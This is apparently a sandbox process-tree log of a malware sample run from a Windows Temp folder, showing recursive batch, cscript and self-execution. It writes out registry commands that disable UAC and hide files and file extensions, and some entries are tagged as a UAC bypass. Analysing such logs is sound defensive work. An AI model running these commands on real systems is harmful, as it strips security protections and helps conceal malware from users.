- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\deUQMQws.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:3928
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:440
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WAUoAsEI.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:4176
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    PID:1692
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KkYYIsIc.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
      4⤵
      PID:3740
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:4588
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      PID:3844
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
      4⤵
      PID:4252
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:4868
  - - C:\Windows\SysWOW64\cscript.exe
      cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
      4⤵
      PID:1820
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    PID:4092
  - - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
      C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
      4⤵
      PID:3604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:3604
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\omQkQogU.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
      4⤵
      PID:1344
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      PID:768
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:3188
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies registry key
      PID:1208
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
      4⤵
      PID:5108
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xMgwssEA.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
        5⤵
        
        PID:2120
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        
        PID:764
      - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
        
        C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
        6⤵
        
        PID:1968
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        
        PID:1820
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies registry key
        
        PID:1272
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        UAC bypass
        
        PID:2540
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:4324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:4176

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4204

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:4364

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:2756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:3592

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:920

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4092

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4372
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:1272
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:3132

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:4936

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:1060
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:684

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1560

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:2412
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dKEEgwYc.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:2388
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:1552
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:1768
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies registry key
  PID:1272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:2380

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:2160

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:752

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:920

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:400

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:3400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vEowgUso.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:1396
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - Modifies registry key
  PID:2160
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:1768
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:4708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:4024
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NwUIoAYc.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:3588
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:2032
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:1272

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:1344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:2380

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2468

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4860
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:2704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bIMkgcok.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:3428
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    PID:4524
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EyAocIgk.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
      4⤵
      PID:2764
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      PID:5060
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\roEYQQEc.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
        5⤵
        
        PID:1188
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        
        PID:4176
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        
        PID:2540
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        
        PID:2400
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
        5⤵
        
        PID:3928
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        6⤵
        
        PID:1768
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      Modifies registry key
      PID:3188
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies registry key
      PID:1560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
      4⤵
      PID:4780
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:4496

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1020
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:2660

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4092

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1344

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:1208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:2828
- - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
    C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
    3⤵
    PID:2940

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:3736
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:4744
- - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
    C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:2468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UYYUwAAk.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:4868
- - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
    C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
    3⤵
    PID:5060
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:4856
- - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
    C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
    3⤵
    PID:2556
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  - Modifies registry key
  PID:4860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZeAwgIsY.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - Modifies registry key
    PID:764
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:2348
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    PID:400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:1864
- - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
    C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
    3⤵
    PID:2388
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:2888

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:3404
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:4508

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4216

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2032

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4176
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VAkMcAgA.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:4360
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:1188
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:1000
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies registry key
  PID:3348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:4744

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2808

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:4608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:400
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:4232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wWEcoMwc.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:2348
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:4776
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:3428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:4032

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UEEwsQkc.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:3880
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:3148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kqQIkkog.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:3852
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    PID:632
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:3588
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:5072
- - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
    C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
    3⤵
    PID:4412
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  - Modifies registry key
  PID:1968
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:3348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:2888

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:3612
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sWQscckc.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:1712
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:4300
  - - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
      C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
      4⤵
      PID:2940
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
        5⤵
        
        PID:2616
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZecoQQUM.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
        6⤵
        
        PID:2440
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        6⤵
        
        PID:1788
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        6⤵
        
        PID:2468
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        6⤵
        
        PID:440
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
        6⤵
        
        PID:4524

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:2380

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1476

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:2616
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:2096
  - - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
      C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
      4⤵
      PID:448

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:3112

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4208
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:2400

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:3612

